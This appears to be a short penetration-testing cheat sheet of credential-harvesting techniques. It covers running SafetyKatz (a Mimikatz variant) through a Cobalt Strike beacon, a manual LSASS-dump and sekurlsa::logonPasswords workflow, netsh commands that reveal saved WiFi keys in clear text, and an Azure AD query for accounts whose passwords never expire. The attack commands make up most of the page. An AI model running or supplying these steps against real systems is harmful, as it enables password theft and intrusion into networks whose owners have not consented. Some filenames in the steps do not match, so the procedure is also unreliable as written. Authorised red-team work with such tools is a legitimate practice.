
The Cloud Source for Client Engagement Resources
Crerdentials
MimiKatz Alternatives:
​
Syntax: {variable-placeholder}
without -c {cmd} returns a cmd shell
​
SafetyKatz (https://github.com/GhostPack/SafetyKatz):
-
C# instantiation of Mimikatz
​​
Via Cobalt Strike Beacon:
-
Compile with VS Community (if not already done)
-
From Beacon: execute-assembly SafetyKatz.exe
​​
Manual Method:
-
Copy SafetyKatz.exe to host
-
Execute SafetyKatz.exe
-
download C:\WINDOWS\Temp\debug808.bin
-
copy to creds folder...
-
mv debug808.bin debug808.gz
-
gzip -d debug.gz
-
sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full
​​
​
​
Harvest Plain-Text WiFI Creds from Windows:
​
-
Open an admin command prompt
-
netsh wlan show profile * lists all wireless profiles
-
netsh wlan show profile name="tgt-profiles" key=clear
* Reveals the PSK
​​
Azure-AD:
Search for User Password Never Expires
-
Get-AzureADUser -All $true | Select-Object UserPrincipalName, @{N="PasswordNeverExpires";E={$_.PasswordPolicies -contains "DisablePasswordExpiration"}}
​​
Placeholder - more to come!:
​
Pentest-Zen (ExitC0de00c.com)
